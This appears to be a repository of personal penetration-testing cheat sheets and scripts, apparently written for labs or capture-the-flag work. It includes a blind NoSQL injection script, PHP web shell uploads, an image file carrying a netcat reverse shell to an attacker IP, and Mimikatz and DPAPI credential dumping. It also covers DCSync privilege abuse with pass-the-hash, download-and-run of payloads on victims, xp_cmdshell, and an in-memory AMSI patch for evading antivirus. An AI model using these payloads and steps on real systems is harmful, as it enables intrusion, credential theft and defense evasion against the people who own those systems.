17 | exploit dev : locate pattern_ 	                                # /usr/share/../../pattern_create.rb
18 | epxloit dev2: /usr/share/../../pattern_create.rb -l 200 	      # generates a string, run it with the binary in gdb and get the break address
19 | exploit dev3: /usr/share/../../pattern_offset.rb -q 62413762    # get offset of the memory address of the break caused by pat_create string (remove the 0x)
20 | 


--------------------------------------------------------------------------------
/scripts/blind_nosqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # Original: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
 3 | import requests
 4 | import urllib3
 5 | import string
 6 | import urllib
 7 | urllib3.disable_warnings()
 8 | 
 9 | username="admin"
10 | password=""
11 | fuzz=""
12 | 
13 | url="http://vulnerable.org"
14 | headers={
15 |         'Content-Type': 'application/x-www-form-urlencoded',
16 |         'Cookie': 'PHPSESSID=xd5s2obg0rvirf3l300kps91jf',
17 |         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
18 |         'Accept-Language': 'en-US,en;q=0.5',
19 |         'Referer': 'http://vulnerable.org/admin.php',
20 |         'Upgrade-Insecure-Requests': '1'
21 | }
22 | 
23 | print("Starting NoSQL injection...")
24 | while True:
25 |     for c in string.printable:
26 |         if c not in ['*','+','.','?','|','&','^']:
27 |             # Can fuzz valid usernames like this aswell
28 |             payload=f"username={username}&password[$regex]=^{fuzz + c}&login=login"
29 |             #payload=f"username[$regex]=^{fuzz + c}&password[$ne]=&login=login"
30 | 
31 |             #print("Sending request...")
32 | 
33 |             r = requests.post(url, data = payload, headers = headers, allow_redirects = False)
34 |             #print(f"Request {c} sent!", end='\r', flush=True)
35 | 
36 |             if 'Welcome, admin!' in r.text or r.status_code == 302:
37 |                 print(f"{c}", end='', flush=True)
38 |                 fuzz += c
39 |             ##
40 | 
41 |         ##
42 |     ##
43 | ##
44 | 


--------------------------------------------------------------------------------
/recon/curl.txt:
--------------------------------------------------------------------------------
 1 | https://www.qed42.com/blog/using-curl-commands-webdav
 2 | Use curl to check for certain attack vectors
 3 | 
 4 | 	Check for web directory permissions:
 5 | 		syntax : curl -v -X OPTIONS <targetURL>
 6 | 		example: curl -v -X OPTIONS http://10.10.12.24/uploads
 7 | 
 8 | 	Upload a file via PUT:
 9 | 		syntax : curl <targetURL> --upload-file <localFile>
10 | 		example: curl http://10.10.12.24/uploads --upload-file venom.exe
11 | 
12 | 		syntax : curl -X PUT -T "<pathToFile>" "<targetURL>/<filename>"
13 | 		example: curl -X PUT -T "/root/Documents/shell.php" "http://myputserver.com/puturl.tmp"
14 | 	
15 | 		syntax : curl -v -X PUT -d '<fileContents>' <targetURL>/<fileName>
16 | 		example: curl -v -X PUT -d '<?php system($_REQUEST["cmd"]); ?>' http://10.10.12.24/test/shell.php
17 | 
18 | 		syntax : curl --upload-file <localFile> -v --url <targetURL>/<fileName> -0
19 | 		example: curl --upload-file shell.php -v --url http://10.10.12.24/test/shell.php -0
20 | 			 # -0 uses http1.0, had to use this before to successfully upload my malicious file
21 | 
22 | 	Move a file via MOVE:
23 | 		syntax : curl -X MOVE --header 'Destination:http://<targetIP>/<newFile>' 'http://<targetIP>/<oldFile>'
24 | 		example: curl -X MOVE --header 'Destination:http://example.org/new.txt' 'https://example.com/old.txt'
25 | 	
26 | 	POST request with cookie and data:
27 | 		syntax : curl <url> -X POST -b "<cookieName>=<cookieValue>" -d "<POSTData>"
28 | 		example: curl http://www.bikinibottom.com/admin/sendmessage.php -X POST -b "PHPSESSID=2usvhvb6r9b8idms0onvd53db4" -d "message=this is Patrick"
29 | 


--------------------------------------------------------------------------------
/windows/switch_user.txt:
--------------------------------------------------------------------------------
 1 | Switch user on a windows machine with powershell:
 2 | 
 3 | 	Step 1(attacker): Make a powershell script with following content (Privesc.ps1):
 4 | 		
 5 | 		$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force 
 6 | 		$mycreds = New-Object System.Management.Automation.PSCredential ("<username>", $secpasswd)
 7 | 		$computer = "<domain>"
 8 | 		[System.Diagnostics.Process]::Start("C:\Documents and settings\guest\Desktop\Shell.exe","", $mycreds.Username, $mycreds.Password, $computer)
 9 | 
10 | 	Step 2 (attacker): generate an msfvenom exe that generates a reverse shell (Shell.exe)
11 | 	Step 3 (attacker): nc -lvnp 443
12 | 	Step 4 (victim)  : get the files 'Privesc.ps1' and 'Shell.exe' over to the victim box
13 | 	Step 5 (victim)  : powershell -ExecutionPolicy Bypass -File C:\Documents and settings\guest\Desktop\Privesc.ps1
14 | 
15 | 
16 | Execute a command as another user:
17 | 
18 | 	syntax :	
19 | 		$user = '<username>';
20 | 		$passwd = '<password>';
21 | 		$secpswd = ConvertTo-SecureString $passwd -AsPlainText -Force;
22 | 		$credential = New-Object System.Management.Automation.PSCredential $user, $secpswd;
23 | 		invoke-command -computername localhost -credential $credential -scriptblock { <command> }
24 | 
25 | 	example: 
26 | 		$user = 'Administrator';
27 | 		$passwd = 'S3cure4dm1nP@ss';
28 | 		$secpswd = ConvertTo-SecureString $passwd -AsPlainText -Force;
29 | 		$credential = New-Object System.Management.Automation.PSCredential $user, $secpswd;
30 | 		invoke-command -computername localhost -credential $credential -scriptblock { type C:\Users\Administrator\Documents\sensitive.txt }
31 | 
32 | 


--------------------------------------------------------------------------------
/post_exploitation/windows/mimikatz.txt:
--------------------------------------------------------------------------------
 1 | Mimikatz is a popular post-exploitation password-dumping tool to be used on a windows target as administrator.
 2 | Get the source code/binaries from 	https://github.com/gentilkiwi/mimikatz/releases
 3 | Extra info:				https://www.varonis.com/blog/what-is-mimikatz/
 4 | 
 5 | Usage:
 6 | 	Step 1: Get the binary to the target machine
 7 | 	Step 2: Run the binary (.\mimikatz.exe)
 8 | 	Step 3: Use the commands you need in the interactive mimikatz terminal
 9 | 
10 | Use mimikatz commands without an interactive shell:
11 | 	syntax : .\mimikatz.exe "<cmd>" "<cmd>" exit
12 | 	example: .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
13 | 	example: .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::cache" exit > mimikatz_output.txt
14 | 
15 | Dump passwords of local target machine's users (also dumps credentials of recent sessions):
16 | 	Optional step 1(victim): log <name>.log		# Keep a log file of all the mimikatz output
17 | 	Step (victim): privilege::debug
18 | 	Step (victim): sekurlsa::logonpasswords
19 | 
20 | SAM database for local account NTLM hashes (token elevate only if you are not SYSTEM):
21 |     example: mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam"
22 |     
23 | Domain Cached Credentials (token elevate only if you are not SYSTEM):
24 |     example: mimikatz.exe "privilege::debug" "token::elevate" "lsadump::cache"
25 | 
26 |     Convert MsCacheV2 hash to hashcat format for cracking:
27 |         mscachev2: dfe982d34ec5e5af9e4da0da8f361ef3
28 |         hashcat  : $DCC2$<iterations>#<username>#<mscachev2>
29 |         example  : $DCC2$10240#t.wellick#dfe982d34ec5e5af9e4da0da8f361ef3
30 | 


--------------------------------------------------------------------------------
/scripts/portscan.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # https://www.pythonforbeginners.com/code-snippets-source-code/port-scanner-in-python/
 3 | import socket
 4 | import subprocess
 5 | import sys
 6 | from datetime import datetime
 7 | 
 8 | # Clear the screen
 9 | subprocess.call('clear', shell=True)
10 | 
11 | # Ask for input
12 | remoteServer    = raw_input("Enter a remote host to scan: ")
13 | remoteServerIP  = socket.gethostbyname(remoteServer)
14 | 
15 | # Print a nice banner with information on which host we are about to scan
16 | print "-" * 60
17 | print "Please wait, scanning remote host", remoteServerIP
18 | print "-" * 60
19 | 
20 | # Check what time the scan started
21 | t1 = datetime.now()
22 | 
23 | # Using the range function to specify ports (here it will scans all ports between 1 and 1024)
24 | 
25 | # We also put in some error handling for catching errors
26 | 
27 | try:
28 |     for port in range(1,1025):  
29 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 |         result = sock.connect_ex((remoteServerIP, port))
31 |         if result == 0:
32 |             print "Port " + str(port) + ": " 	 "      Open"
33 |         sock.close()
34 | 
35 | except KeyboardInterrupt:
36 |     print "You pressed Ctrl+C"
37 |     sys.exit()
38 | 
39 | except socket.gaierror:
40 |     print 'Hostname could not be resolved. Exiting'
41 |     sys.exit()
42 | 
43 | except socket.error:
44 |     print "Couldn't connect to server"
45 |     sys.exit()
46 | 
47 | # Checking the time again
48 | t2 = datetime.now()
49 | 
50 | # Calculates the difference of time, to see how long it took to run the script
51 | total =  t2 - t1
52 | 
53 | # Printing the information to screen
54 | print 'Scanning Completed in: ', total
55 | 


--------------------------------------------------------------------------------
/remote_connection/winrm_cert.rb:
--------------------------------------------------------------------------------
 1 | require 'winrm-fs'
 2 | 
 3 | # Author: Alamot
 4 | # To upload a file type: UPLOAD local_path remote_path
 5 | # e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
 6 | 
 7 | conn = WinRM::Connection.new( 
 8 |   endpoint: 'https://<victimIP>:5986/wsman',
 9 |   transport: :ssl,
10 |              :client_cert => 'AdministratorUser.pem',
11 |              :client_key => 'AdministratorKey.pem',
12 | 
13 |   :no_ssl_peer_verification => true
14 | )
15 | 
16 | file_manager = WinRM::FS::FileManager.new(conn) 
17 | 
18 | 
19 | class String
20 |   def tokenize
21 |     self.
22 |       split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
23 |       select {|s| not s.empty? }.
24 |       map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
25 |   end
26 | end
27 | 
28 | 
29 | command=""
30 | 
31 | conn.shell(:powershell) do |shell|
32 |     until command == "exit\n" do
33 |         output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
34 |         print(output.output.chomp)
35 |         command = gets
36 |         if command.start_with?('UPLOAD') then
37 |             upload_command = command.tokenize
38 |             print("Uploading " + upload_command[1] + " to " + upload_command[2])
39 |             file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
40 |                 puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
41 |             end
42 |             command = "echo `nOK`n"
43 |         end
44 | 
45 |         output = shell.run(command) do |stdout, stderr|
46 |             STDOUT.print(stdout)
47 |             STDERR.print(stderr)
48 |         end
49 |     end    
50 |     puts("Exiting with code #{output.exitcode}")
51 | end
52 | 
53 | 
54 | 


--------------------------------------------------------------------------------
/file_inclusion/lfi.txt:
--------------------------------------------------------------------------------
 1 | Use php local file inclusion + log poisoning to get remote command execution:
 2 | 
 3 | 	Step 1(host):
 4 | 		syntax : nc -nv <targetIP> <port>
 5 | 		example: nc -nv 10.23.12.32 80		
 6 | 	
 7 | 	Step 2(host): <?php echo shell_exec($_GET['cmd']); ?>
 8 | 		      # Entering this over a netcat session might log it into the target's log files,
 9 | 			allowing us to display and execute the php line via local file inclusion.
10 | 
11 | 	Step 3(host):
12 | 		syntax : http://vulnsite.com/vuln.php?cmd=<command>&language=../../../../../../<pathToLogfile>
13 | 		example: http://vulnsite.com/vuln.php?cmd=whoami&language=../../../../../../var/html/www/access.log
14 | 			 # The logfiles might be in different locations, depending on the target system
15 | 
16 | Php local file inclusion base64 method:
17 | 
18 | 	example: http://vulnsite.com/?page=php://filter/convert.base64-encode/resource=config
19 | 	example: http://vulnsite.com/?page=php://filter/convert.base64-encode/resource=upload
20 | 	example: http://vulnsite.com/browse.php?lang=php://filter/convert.base64-encode/resource=index.php HTTP/1.1
21 | 
22 | 
23 | Php upload file bypass by embeddig php code into image/gif files:
24 | 
25 | 	#'pikachu.gif' is a random gif I found on the internet, 'shell.php' is the file that contains the malicious php code
26 | 
27 | 	GIF file with php code via gifsicle:
28 | 		
29 | 		syntax : gifsicle < <random>.gif --comment '<maliciousContent>' > <file>.php.gif
30 | 		example: gifsicle < pikachu.gif --comment "<?php system('nc -e /bin/sh 192.168.0.123 443') ?>" > output.php.gif
31 | 
32 | 
33 | 	JPG file with php code via python:
34 | 		
35 | 		Step 1: python
36 | 		Step 2: aRandomName = open ('pikachu.gif','rb').read()
37 | 		Step 3: aRandomName += open ('shell.php','rb').read()
38 | 		Step 4: open ('newshell.php.jpg','wb').write(aRandomName)
39 | 


--------------------------------------------------------------------------------
/windows/dpapi.txt:
--------------------------------------------------------------------------------
 1 | DPAPI (https://en.wikipedia.org/wiki/Data_Protection_API)
 2 | 
 3 | Check saved credentials in Credential Manager for the current user:
 4 |     example: vaultcmd.exe /listcreds:"Windows Credentials" /all
 5 | 
 6 | Find the credential blobs in "C:\Users\<user>\AppData\Local\Microsoft\Credentials" and dump them with Mimikatz:
 7 |     Step 1:
 8 |         syntax : mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\<credentialBlob>" exit
 9 |         example: mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\d.alderson\AppData\Local\Microsoft\Credentials\1DD604C1E148746934B92E2A20319754" exit
10 |     Step 2:
11 |          Grab the guidMasterKey value
12 | 
13 | Find the masterkey information in "C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<userSid>":
14 |     Step 1: Find SID for current user with "whoami /all"
15 |     Step 2: There's a directory that matches the guidMasterKey
16 | 
17 | Retrieve the MasterKey from the Domain Controller:
18 |     Step 1:
19 |         syntax : mimikatz.exe "privilege::debug" "dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<userSid>\<guidMasterKey> /rpc" exit
20 |         example: mimikatz.exe "privilege::debug" "dpapi::masterkey /in:C:\Users\d.alderson\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1132\fcf4f725-0947-4180-a924-bc9da9ed8910 /rpc" exit
21 |     Step 2:
22 |         Grab the key value
23 | 
24 | Decrypt the credential blob with the MasterKey:
25 |     syntax : mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\<credentialBlob> /masterkey:<masterKey>"
26 |     example: mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\d.alderson\AppData\Local\Microsoft\Credentials\5DD604C1E108746934B92E2A20318758 /masterkey:<masterKey>"
27 | 
28 | 


--------------------------------------------------------------------------------
/filetransfer/windows/vbs.txt:
--------------------------------------------------------------------------------
 1 | Transfer files to windows via a vbs script:
 2 | 	
 3 | 	Step 1(victim): Execute following script on the target machine
 4 | 
 5 | 		echo strUrl = WScript.Arguments.Item(0) > wget.vbs
 6 | 		echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
 7 | 		echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
 8 | 		echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
 9 | 		echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
10 | 		echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
11 | 		echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
12 | 		echo Err.Clear >> wget.vbs
13 | 		echo Set http = Nothing >> wget.vbs
14 | 		echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
15 | 		echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
16 | 		echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
17 | 		echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
18 | 		echo http.Open "GET", strURL, False >> wget.vbs
19 | 		echo http.Send >> wget.vbs
20 | 		echo varByteArray = http.ResponseBody >> wget.vbs
21 | 		echo Set http = Nothing >> wget.vbs
22 | 		echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
23 | 		echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
24 | 		echo strData = "" >> wget.vbs
25 | 		echo strBuffer = "" >> wget.vbs
26 | 		echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
27 | 		echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
28 | 		echo Next >> wget.vbs
29 | 		echo ts.Close >> wget.vbs
30 | 
31 | 	Step 2(host)  : open http server
32 | 	Step 3(victim): 
33 | 		
34 | 		syntax : cscript wget.vbs http://<hostIP>:<port>/<file> <outFile> 
35 | 		example: cscript wget.vbs http://192.168.0.213:8000/vuln.exe vuln.exe
36 | 


--------------------------------------------------------------------------------
/databases/sql/oracle/odat.txt:
--------------------------------------------------------------------------------
 1 | Odat is a multi-purpose tool for oracle databases (odat -h, odat <module> -h)
 2 | 
 3 | 
 4 | Use odat to enumerate SID on an oracle TNS listener:
 5 | 
 6 | 	syntax : odat sidguesser -s <targetIP> -p <port>
 7 | 	example: odat sidguesser -s 10.12.32.12 -p 1521
 8 | 
 9 | 
10 | Use odat to bruteforce passwords on an oracle TNS listener with known SID:
11 | 
12 | 	syntax : odat passwordguesser -s <targetIP> -p <port> -d <SID>
13 | 	example: odat passwordguesser -s 10.10.10.82 -p 1521 -d CLIENTS
14 | 	example: odat passwordguesser -s 12.12.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/oracle_default_userpass.txt	# /usr/share/metasploit-framewoek/data/wordlists/oracle_default_userpass.txt
15 | 
16 | 
17 | Use odat to upload/get files:
18 | 	
19 | 	get privilege:
20 | 		syntax : odat privesc -s <targetIP> -d <SID> -U <user> -P <pass> --sysdba --dba-with-execute-any-procedure
21 | 		example: odat privesc -s 10.12.13.42 -d CLIENTS -U tyrone -P passw0rd --sysdba --dba-with-execute-any-procedure
22 | 	upload:
23 | 		syntax : odat dbmsxslprocessor -s <targetIP> -U <user> -P <pass> -d <SID> -sysdba -putFile '<targetDiskPath>' '<fileName>' '<hostPath>/<file>'
24 | 		example: odat dbmsxslprocessor -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --putFile ‘C:\\inetpub\\wwwroot\\‘ ‘venom.aspx’ ‘/usr/share/webshells/aspx/cmdasp.aspx’
25 | 		example: odat utlfile -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --putFile C:\\inetpub\\wwwroot\\ venom.aspx /usr/share/webshells/aspx/cmdasp.aspx
26 | 		
27 | 	get:
28 | 		example: odat utlfile -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --getFile C:\\inetpub\\wwwroot\\ venom.aspx /usr/share/webshells/aspx/cmdasp.aspx 
29 | 
30 | 
31 | Use odat to execute scripts/commands:
32 | 
33 | 	syntax : odat externaltable -s <targetIP> -U <user> -P <pass> -d <SID> --sysdba --exec <remotePath> <remoteFile>
34 | 	example: odat externaltable -s 10.12.14.82 -U tyrone -P passw0rd -d CLIENTS --sysdba --exec C:\\inetpub\\wwwroot venom.exe
35 | 


--------------------------------------------------------------------------------
/databases/sql/mssql/mssql.txt:
--------------------------------------------------------------------------------
 1 | Useful commands for pentesting Microsoft SQL Server instances:
 2 | 
 3 | 	# Get current database
 4 | 		example: SELECT DB_NAME();
 5 | 
 6 | 	# Get all databases
 7 | 		example: SELECT name FROM master..sysdatabases;
 8 | 
 9 | 	# Show all tables of current database
10 | 		example: select * from information_schema.tables;
11 | 
12 | 	# Show all columns of table
13 | 		syntax : select * from information_schema.colums where table_name = '<tablename>';
14 | 
15 | 	# Show all users
16 | 		example: use master; select * from sys.syslogins;
17 | 
18 | 	# Show all user password hashes
19 | 		syntax : select loginproperty('<username>', 'PasswordHash');
20 | 
21 | 	# Create user
22 | 		syntax : exec master..sp_addlogin <username>, <password>;
23 | 		syntax : create login <username> with password='<password>';
24 | 
25 | 	# Select users with sysadmin rights
26 | 		example: select loginname from syslogins where sysadmin = 1;
27 | 
28 | 	## Check if current user is in given role
29 | 		syntax : select is_srvrolemember('<role>');
30 | 		example: select is_srvrolemember('sysadmin');
31 | 
32 | 	# Add user to certain role
33 | 		syntax : exec sp_addsrvrolemember '<username>', '<role>';
34 | 		example: exec sp_addsrvrolemember 'developer', 'sysadmin';
35 | 
36 | 	# Enable xp_cmdshell to execute commands on the underlying system
37 | 		Step 1(host): EXEC SP_CONFIGURE 'show advanced options', 1
38 | 		Step 2(host): reconfigure
39 | 		Step 3(host): go
40 | 		Step 4(host): EXEC SP_CONFIGURE 'xp_cmdshell', 1
41 | 		Step 5(host): reconfigure
42 | 		Step 6(host): go
43 | 
44 | 		Optional step 7(host): xp_cmdshell 'whoami'
45 | 		Optional Step 7(host): go
46 | 
47 | 	# Check linked servers and execute commands on them
48 | 		Step 1 : sp_linkedservers	
49 | 			# select * from master..sysservers
50 | 		Step 2 : EXECUTE('<sqlCommand>') AT "<sqlServer>"
51 | 		example: EXECUTE(' select * from information_schema.tables where table_schema = ''secrets'' ') AT "ECORP\SECRET_DB"
52 | 		example: select * from openquery("ECOPR\SECRET_DB",'select @@version')
53 | 


--------------------------------------------------------------------------------
/recon/nmap.txt:
--------------------------------------------------------------------------------
 1 | flags:	-sC = default scripts	-sv = enumerate versions	-oN = output nmap format	-A = enumerate OS	-sS = stealth
 2 | 	-p = port		-sU = udp scan			-p- = all ports			-T = aggressive scan	--script = script	
 3 | 	-sN = TCP NUll, Xmas Scan 
 4 | Scan TCP ports 1-1000: 
 5 | 	syntax : nmap -sC -sV -oN <filename> <ip> (--min-rate 10000)
 6 | 	example: nmap -sC -sV -oN testTcp.nmap 10.12.52.211
 7 | 	example: nmap -p 445 --script safe -Pn -n 10.10.12.56
 8 | 
 9 | Scan UDP ports 1-1000:
10 | 	syntax : nmap -sU -v -oN <filename> <ip>
11 | 	example: nmap -sU -v -oN testUDP.nmap 10.12.15.72
12 | 
13 | Run an nmap on a specific port on a target host:
14 | 	syntax : nmap -sS <protocol> -A -p<port> <targetIP>
15 | 	example: nmap -sS -sU -A -p161 10.12.10.116
16 | 
17 | Scan all TCP ports:
18 | 	syntax : nmap -p- -v --max-retries 0 -oN <filename> <ip>
19 | 	example: nmap -p- -v --max-retries 0 -oN testTcpAll.nmap 10.15.12.157
20 | 
21 | Scan all ports with aggressiveness level (T5):
22 | 	syntax : nmap -p- -v --max-retries=0 -T<i> <ip>
23 | 	example: nmap -p- -v --max-retries=0 -T5 10.12.14.12
24 | 
25 | Scan IP range for hosts:
26 | 	syntax : nmap -sn -oG <fileName> <subnet>.<hostStart>-<hostEnd>	  # -oG for greppable output format
27 | 	example: nmap -sn -oG pingsweep.nmap 192.168.230.1-254
28 | 
29 | 	syntax : nmap -p <port> -oG <fileName> <subnet>.<hostStart>-<hostEnd> 	# scan IP range for open <port>
30 | 	example: nmap -p 22 -oG pingsweep.nmap 192.168.220.200-254
31 | 
32 | Vulnerability scan:
33 | 	syntax : nmap --script vuln <targetIP>
34 | 	example: nmap --script vuln 10.13.14.44
35 | 
36 | Default scan for all TCP ports:
37 | 	syntax : nmap -sC -sV -p- --min-rate <rate> -Pn -oN <outFIle> <targetIP>
38 | 	example: nmap -sC -sV -p- --min-rate 2000 -Pn -oN full-tcp.nmap 10.10.12.13
39 | 
40 | Default scan for all UDP ports:
41 | 	syntax : nmap -sC -sV -sU --top-ports <portRange> --min-rate <rate> -oN <outFile> <targetIP>
42 | 	example: nmap -sC -sV -sU --top-ports 10000 --min-rate 2000 -oN full-udp.nmap 10.10.123.121
43 | 
44 | Scan TCP Xmas Scan ports 
45 | 	syntax : nmap -p <portRange> -sN <targetIP>
46 | 	example: nmap -p 1-1000 -sN 192.168.1.124
47 | 


--------------------------------------------------------------------------------
/windows/active_directory/writeDACL.txt:
--------------------------------------------------------------------------------
 1 | Abuse WriteDACL permissions to get DCSync rights to dump hashes of all users (including admin).
 2 | 
 3 | Here are some examples of how to do this (target machine is a domain controller):
 4 | 
 5 | 	For this example, we use the "Exchange Windows Permissions" group to get WriteDACL rights, but
 6 | 	there are other groups that allow this aswell.	
 7 | 	
 8 | 	# POWERVIEW IS NEEDED FOR THIS TO WORK
 9 | 
10 | 	Example 1:
11 | 		# <ownedUser> is the user you already have access to on the domain
12 | 
13 | 		Step 1(victim)  : net group "Exchange Windows Permissions" <ownedUser> /add /domain
14 | 		Step 2(victim)  : Give yourself DCSync rights by writing to ACL
15 | 			syntax : Add-ObjectACL -TargetIdentity <domain> -PrincipalIdentity <ownedUser> -Rights DCSync -Verbose
16 | 			example: Add-ObjectACL -TargetIdentity 'ECORP.local' -PrincipalIdentity 'tyrell' -Rights DCSync -Verbose
17 | 		Step 3(attacker): 
18 | 			syntax : impacket-secretsdump <domain>/<ownedUser>@<targetIP> -just-dc-ntlm
19 | 			example: impacket-secretsdump ECORP/tyrell@10.10.12.123 -just-dc-ntlm
20 | 
21 |    		Step 4(attacker): You can either crack the hashes or pass the hash with different commands
22 | 			syntax : pth-winexe -U <targetUser>%<lmhash>:<nthash> //<targetIP> <command>
23 | 			example: pth-winexe -U Administrator%aad3b425b51434eeaad3b435b51404ff:32693b11e6aa90ef43d32c42a67ceea6 //10.10.12.123 cmd
24 | 
25 | 	Example 2:
26 | 		# Get 'powerview.ps1' and 'mimikatz.exe' to the target box
27 | 
28 | 		Step 1(victim)	: Import-Module ./powerview.ps1
29 |     		Step 2(victim)	: Add-DomainGroupMember -Identity 'EXCHANGE WINDOWS PERMISSIONS' -Members '<ownedUser>'
30 |     				# Log out and back in after this for the group policy to take effect
31 | 
32 |     		Step 3(victim)	: Import-Module ./powerview.ps1
33 |     		Step 4(victim)	: Add-ObjectACL -TargetIdentity <domain> -PrincipalIdentity <ownedUser> -Rights DCSync -Verbose
34 |     		Step 5(victim)	: .\mimikatz.exe
35 | 		Step 6(victim)	: mimikatz # lsadump::dcsync /domain:<domain> /user:<targetUser>
36 | 
37 |    		Step 7(attacker): impacket-wmiexec -hashes <lmhash>:<nthash> <targetUser>@<targetIP>
38 | 				  # or crack the hashes
39 | 


--------------------------------------------------------------------------------
/bruteforce/hashcat.txt:
--------------------------------------------------------------------------------
 1 | Cracking hashes with hashcat, check the numbers for hashtype on the internet: (https://hashcat.net/wiki/doku.php?id=example_hashes)
 2 | 	Get hashtypes: hashcat --example-hashes | less
 3 | 	syntax : hashcat -m <hashMode> -a <attackType> -o <outputFile> (--remove) <hashFile> <wordlist> --force
 4 | 	example: hashcat -m 5600 -a 0 -o cracked.txt ntlm2Hash.txt /usr/share/wordlists/rockyou.txt --force
 5 | OR
 6 | 	syntax : hashcat -m <hashMode> -o <outputFile> <hashFile> <dictionary> --force
 7 | 	example: hashcat -m 13100 -o cracked.txt adminHash.txt /usr/share/wordlists/rockyou.txt --force
 8 | 
 9 | Cracking hashes with hashcat where salt and hash were found separate:
10 | 	Step 1: We have found hash: 62def2866337f08cc14bab43bb14e6f7 and salt: 5a569ef575066807
11 | 	Step 2: We know that this is an MD5 hash, so we save the hash in 'hash.txt' like this: 62def2866337f08cc14bab43bb14e6f7:5a569ef575066807
12 | 	Step 3: hashcat -m 20 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt --force
13 | 
14 | Generate a wordlist with hashcat's bruteforce mode:
15 | 	syntax : hashcat --stdout -a <attackType> <charsets> | tee <outFile>	# hashcat -h  -> look for charset
16 | 	example: hashcat --stdout -a 3 secret1?d?s | tee wordlist.txt
17 | 
18 | Crack hashes with a mask attack (we know the password policy is one uppercase letter, 8 min length and one digit):
19 |     Check hashcat -h for charsets and use them accordingly (1 = a-z):
20 |         syntax : hashcat -a <attackType> -m <hashMode> <hashFile> <mask>
21 |         example: hashcat -a 3 -m 1000 ntlm.txt ?u?l?l?l?l?l?l?d
22 | 
23 |     What if end of the password could be either a number or a special character:
24 |         syntax : hashcat -a <attackType> -m <hashMode> <hashFile> -1 <customCharset> <mask>
25 |         example: hashcat -a 3 -m 1000 ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?1
26 |                  # ?1 here is our custom charset (?d?s)
27 |         example: hashcat -a 3 -m 1000 ntlm.txt -1 ?d?s EvilCorp?1?d 
28 | 
29 | extra info: '-m' specifies which hash-type it is, '-a' specifies what kind of attack we need (0 is a dictionary attack), all hashes to be cracked should be in the 'hashFile'
30 | 	    if needed, add the '--remove' flag to remove the hashes from the 'hashFile' if they have been cracked
31 | 


--------------------------------------------------------------------------------
/defense_evasion/amsi/AmsiPatchInMemory.ps1:
--------------------------------------------------------------------------------
 1 | # Patch AMSI's AmsiOpenSession function in-memory using the Win32 API.
 2 | # We resolve the functions from kernel32 dynamically in Powershell to prevent dropping temporary files to disk via .NET assembly loading, for example
 3 | 
 4 | # function to dynamically lookup functions in system dll's at runtime
 5 | function LookupFunc {
 6 | 	Param ($moduleName, $functionName)
 7 | 	$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 
 8 | 	Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
 9 | 	Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
10 | 	$tmp=@()
11 | 	$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
12 | 	return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
13 | }
14 | 
15 | # function to create delegate types for Win32 API functions
16 | function getDelegateType {
17 | 	Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
18 | 	
19 | 	$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 
20 | 	[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).
21 | 	DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
22 | 	 
